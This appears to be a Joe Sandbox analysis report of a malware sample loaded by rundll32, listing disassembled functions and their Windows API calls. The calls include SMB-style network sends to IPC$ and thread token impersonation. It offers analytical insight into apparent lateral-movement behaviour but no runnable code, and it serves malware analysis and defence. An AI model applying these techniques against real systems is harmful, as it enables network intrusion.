Part of subcall function 00476DA4: LeaveCriticalSection.KERNEL32(?,?,?,00476E98,002F16E0,00000000,?,?,00476A84,002F16E0,?), ref: 00476E0C

GetProcessHeap.KERNEL32(00000008,?,?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F41
HeapReAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F48

Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,00000008,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EB8
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EC1
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,?,?,?,00476A84,002F16E0,?,?), ref: 00476ED9
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EDC
Part of subcall function 00476E66: memcpy.MSVCRT ref: 00476F0D
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000000,?,?,?,00476A84,002F16E0,?,?), ref: 00476F26
Part of subcall function 00476E66: HeapFree.KERNEL32(00000000), ref: 00476F29

LeaveCriticalSection.KERNEL32(?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F6C

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004769AE, Relevance: 12.6, APIs: 10, Instructions: 97

APIs

GetProcessHeap.KERNEL32(00000008,?,76EBE52D,00000000,00000000), ref: 004769E3
HeapAlloc.KERNEL32(00000000), ref: 004769EC
memcpy.MSVCRT ref: 00476A19
GetProcessHeap.KERNEL32(00000008,?), ref: 00476A3D
HeapAlloc.KERNEL32(00000000), ref: 00476A40
memcpy.MSVCRT ref: 00476A6F

Part of subcall function 00476E66: EnterCriticalSection.KERNEL32(?,002F16E0,757DC570,757DFE8D,?,?,00476A84,002F16E0,?,?), ref: 00476E87
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,00000008,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EB8
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EC1
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,?,?,?,00476A84,002F16E0,?,?), ref: 00476ED9
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EDC
Part of subcall function 00476E66: memcpy.MSVCRT ref: 00476F0D
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000000,?,?,?,00476A84,002F16E0,?,?), ref: 00476F26
Part of subcall function 00476E66: HeapFree.KERNEL32(00000000), ref: 00476F29
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,?,?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F41
Part of subcall function 00476E66: HeapReAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F48
Part of subcall function 00476E66: LeaveCriticalSection.KERNEL32(?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F6C

GetProcessHeap.KERNEL32(00000000,?,002F16E0,?,?), ref: 00476A8F
HeapFree.KERNEL32(00000000), ref: 00476A92
GetProcessHeap.KERNEL32(00000000,?), ref: 00476A99
HeapFree.KERNEL32(00000000), ref: 00476A9C

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004768B5, Relevance: 12.6, APIs: 10, Instructions: 96

APIs

GetProcessHeap.KERNEL32(00000008,?,761B423D,00000000), ref: 004768EB
HeapAlloc.KERNEL32(00000000), ref: 004768F4
memcpy.MSVCRT ref: 00476921
GetProcessHeap.KERNEL32(00000008,?,757DCF90), ref: 00476946
HeapAlloc.KERNEL32(00000000), ref: 00476949
memcpy.MSVCRT ref: 00476978

Part of subcall function 00476E1B: EnterCriticalSection.KERNEL32(?,757DC570,757DFE8D,?,?,0047698E,?), ref: 00476E2A
Part of subcall function 00476E1B: LeaveCriticalSection.KERNEL32(?,0047698E,?,?,?,0047698E,?), ref: 00476E58

GetProcessHeap.KERNEL32(00000000,?,?), ref: 00476995
HeapFree.KERNEL32(00000000), ref: 00476998
GetProcessHeap.KERNEL32(00000000,?), ref: 0047699F
HeapFree.KERNEL32(00000000), ref: 004769A2

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00474F43, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 82

APIs

GetProcessHeap.KERNEL32(00000008,00000068,757DFE8D,?,773E29EE,?,004751F9,?,?,?), ref: 00474F56
HeapAlloc.KERNEL32(00000000,?,004751F9,?,?,?), ref: 00474F5D
rand.MSVCRT ref: 00474F86

Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 00472F73
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F7C
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?,76F1C070), ref: 00472F97
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F9A
Part of subcall function 00472F5A: htons.WS2_32(424D53FE), ref: 00472FBA
Part of subcall function 00472F5A: memcpy.MSVCRT ref: 0047300B
Part of subcall function 00472F5A: send.WS2_32(?,00000000,?,00000000), ref: 0047301B
Part of subcall function 00472F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473032
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473048
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 0047304F
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 0047305A
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 00473061

HeapFree.KERNEL32(00000000,?,004751F9), ref: 0047500E

Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000FFFF,757DFE8D,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 00473089
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473092
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000003F,757DC570,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A4
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A7
Part of subcall function 00473071: htons.WS2_32(0000003B), ref: 004730BF
Part of subcall function 00473071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 004730F7
Part of subcall function 00473071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0047310D
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473127
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0047312E
Part of subcall function 00473071: memcpy.MSVCRT ref: 00473144
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473153
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047315A
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473165
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047316C

GetProcessHeap.KERNEL32(00000008,?,004751F9,?,00000000,?,004751F9,004751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 00474FF7
HeapFree.KERNEL32(00000000), ref: 00474FFE
GetProcessHeap.KERNEL32(00000008,00000000,004751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,004751F9,?,?,?), ref: 00475007

Strings

p, xrefs: 00474FCF

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00474E60, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 91

APIs

GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 00474E76
HeapAlloc.KERNEL32(00000000), ref: 00474E79

Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 00472F73
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F7C
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?,76F1C070), ref: 00472F97
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F9A
Part of subcall function 00472F5A: htons.WS2_32(424D53FE), ref: 00472FBA
Part of subcall function 00472F5A: memcpy.MSVCRT ref: 0047300B
Part of subcall function 00472F5A: send.WS2_32(?,00000000,?,00000000), ref: 0047301B
Part of subcall function 00472F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473032
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473048
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 0047304F
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 0047305A
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 00473061

HeapFree.KERNEL32(00000000), ref: 00474F35

Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000FFFF,757DFE8D,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 00473089
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473092
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000003F,757DC570,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A4
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A7
Part of subcall function 00473071: htons.WS2_32(0000003B), ref: 004730BF
Part of subcall function 00473071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 004730F7
Part of subcall function 00473071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0047310D
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473127
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0047312E
Part of subcall function 00473071: memcpy.MSVCRT ref: 00473144
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473153
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047315A
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473165
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047316C

GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00474F2A
HeapFree.KERNEL32(00000000), ref: 00474F2D
GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 00474F32

Strings

07H, xrefs: 00474E8B

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004750A2, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 79

APIs

GetProcessHeap.KERNEL32(00000008,00000034,757DFE8D,00000000,?,?,?,004752FD,?,?,?,?,?,?,?,00000000), ref: 004750B3
HeapAlloc.KERNEL32(00000000,?,?,?,004752FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004750BA

Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 00472F73
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F7C
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?,76F1C070), ref: 00472F97
Part of subcall function 00472F5A: HeapAlloc.KERNEL32(00000000), ref: 00472F9A
Part of subcall function 00472F5A: htons.WS2_32(424D53FE), ref: 00472FBA
Part of subcall function 00472F5A: memcpy.MSVCRT ref: 0047300B
Part of subcall function 00472F5A: send.WS2_32(?,00000000,?,00000000), ref: 0047301B
Part of subcall function 00472F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473032
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473048
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 0047304F
Part of subcall function 00472F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 0047305A
Part of subcall function 00472F5A: HeapFree.KERNEL32(00000000), ref: 00473061

HeapFree.KERNEL32(00000000), ref: 0047515F

Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000FFFF,757DFE8D,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 00473089
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473092
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000003F,757DC570,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A4
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A7
Part of subcall function 00473071: htons.WS2_32(0000003B), ref: 004730BF
Part of subcall function 00473071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 004730F7
Part of subcall function 00473071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0047310D
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473127
Part of subcall function 00473071: HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0047312E
Part of subcall function 00473071: memcpy.MSVCRT ref: 00473144
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473153
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047315A
Part of subcall function 00473071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473165
Part of subcall function 00473071: HeapFree.KERNEL32(00000000), ref: 0047316C

GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76F2D354), ref: 00475148
HeapFree.KERNEL32(00000000), ref: 0047514F
GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76F2D354,?,?,?,004752FD,?), ref: 00475158

Strings

07H, xrefs: 004750CB

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004733A4, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473745,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 004733BB
HeapAlloc.KERNEL32(00000000,?,00473745,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 004733C2
htons.WS2_32(?), ref: 004733E1
memcpy.MSVCRT ref: 00473410
send.WS2_32(?,00000000,?,00000000), ref: 00473421
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473434
HeapFree.KERNEL32(00000000), ref: 0047343B

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00473209, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 00473220
HeapAlloc.KERNEL32(00000000,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 00473227
htons.WS2_32(?), ref: 00473246
memcpy.MSVCRT ref: 00473276
send.WS2_32(?,00000000,?,00000000), ref: 00473287
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047329A
HeapFree.KERNEL32(00000000), ref: 004732A1

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476BD1, Relevance: 10.1, APIs: 8, Instructions: 61

APIs

GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C29
HeapFree.KERNEL32(00000000), ref: 00476C2C
GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C39
HeapFree.KERNEL32(00000000), ref: 00476C3C
GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C4E
HeapFree.KERNEL32(00000000), ref: 00476C51
GetProcessHeap.KERNEL32(00000000,00000000,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C56
HeapFree.KERNEL32(00000000), ref: 00476C59

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047652F, Relevance: 9.1, APIs: 6, Instructions: 88

APIs

CommandLineToArgvW.SHELL32(?,?), ref: 00476566
StrToIntW.SHLWAPI(00000000), ref: 00476581
StrStrW.SHLWAPI(00000000,00481580), ref: 004765B3

Part of subcall function 004764A6: CommandLineToArgvW.SHELL32(-00000004,?), ref: 004764DC
Part of subcall function 004764A6: LocalFree.KERNEL32(00000000,?,?,?,004765C0,?,?,?,?,?,00477A8E,?), ref: 00476522

Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?,76EBE52D,00000000,00000000), ref: 004769E3
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 004769EC
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A19
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?), ref: 00476A3D
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 00476A40
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A6F
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?,002F16E0,?,?), ref: 00476A8F
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A92
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?), ref: 00476A99
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A9C

StrStrW.SHLWAPI(00000000,00481588), ref: 004765CD
StrChrW.SHLWAPI(00000000,0000003A), ref: 004765DF
LocalFree.KERNEL32(00000000,?,?,?,?,00477A8E,?), ref: 00476607

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004798AB, Relevance: 9.1, APIs: 6, Instructions: 76

APIs

Part of subcall function 00476CED: GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000), ref: 00476CFC
Part of subcall function 00476CED: HeapAlloc.KERNEL32(00000000,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000,00000024,00476AA8), ref: 00476CFF
Part of subcall function 00476CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000,00000000), ref: 00476D24
Part of subcall function 00476CED: HeapFree.KERNEL32(00000000), ref: 00476D27

CreateThread.KERNEL32(00000000,00000000,0047988B,?,00000004,00000000), ref: 004798FD
SetThreadToken.ADVAPI32(?,?,?,0047A15C,?,00000000), ref: 0047990F
ResumeThread.KERNEL32(?,?,0047A15C,?,00000000), ref: 0047991C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0047992C
GetLastError.KERNEL32(?,0047A15C,?,00000000), ref: 00479934
CloseHandle.KERNEL32(?), ref: 0047993D

Part of subcall function 00476B46: GetProcessHeap.KERNEL32(00000000,"gG,?,00476722,?), ref: 00476B4E
Part of subcall function 00476B46: HeapFree.KERNEL32(00000000,?,00476722), ref: 00476B55

Part of subcall function 00476D35: EnterCriticalSection.KERNEL32(00000000,757DFE8D,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000), ref: 00476D46
Part of subcall function 00476D35: LeaveCriticalSection.KERNEL32(00000000,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D7F
Part of subcall function 00476D35: Sleep.KERNELBASE(00002710,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D97

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476735, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

Part of subcall function 00476477: GetTickCount.KERNEL32(00477DDC,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00476477

wsprintfW.USER32 ref: 00476758
EnterCriticalSection.KERNEL32(00487B9C,00007FD3,002F16E0,00000028), ref: 00476783
LeaveCriticalSection.KERNEL32(00487B9C), ref: 004767EA

Part of subcall function 00476628: wsprintfW.USER32 ref: 004766C0
Part of subcall function 00476628: StrCatW.SHLWAPI(00483B90,?), ref: 004766F8

StrCatW.SHLWAPI(?,?), ref: 004767D1
StrCatW.SHLWAPI(?,00483B90), ref: 004767D7
SetLastError.KERNEL32(0000007A), ref: 004767DF

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A3B1, Relevance: 9.0, APIs: 6, Instructions: 44

APIs

CreateThread.KERNEL32(00000000,00000000,0047A016,00000000,00000004,00000000), ref: 0047A3C9
SetThreadToken.ADVAPI32(?,?,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3DD
ResumeThread.KERNEL32(?,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3EA
GetLastError.KERNEL32(?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3F7
CloseHandle.KERNEL32(?), ref: 0047A402
SetLastError.KERNEL32(00000057,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A411

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047796E, Relevance: 9.0, APIs: 6, Instructions: 36

APIs

CreateThread.KERNEL32(00000000,00000000,00477957,00000000,00000004,00000000), ref: 00477988
SetThreadToken.ADVAPI32(?,00000000,?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 0047799C
ResumeThread.KERNEL32(?,?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 004779A9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004779B9
GetLastError.KERNEL32(?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 004779C1
CloseHandle.KERNEL32(?), ref: 004779CA

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047317C, Relevance: 7.6, APIs: 6, Instructions: 57

APIs

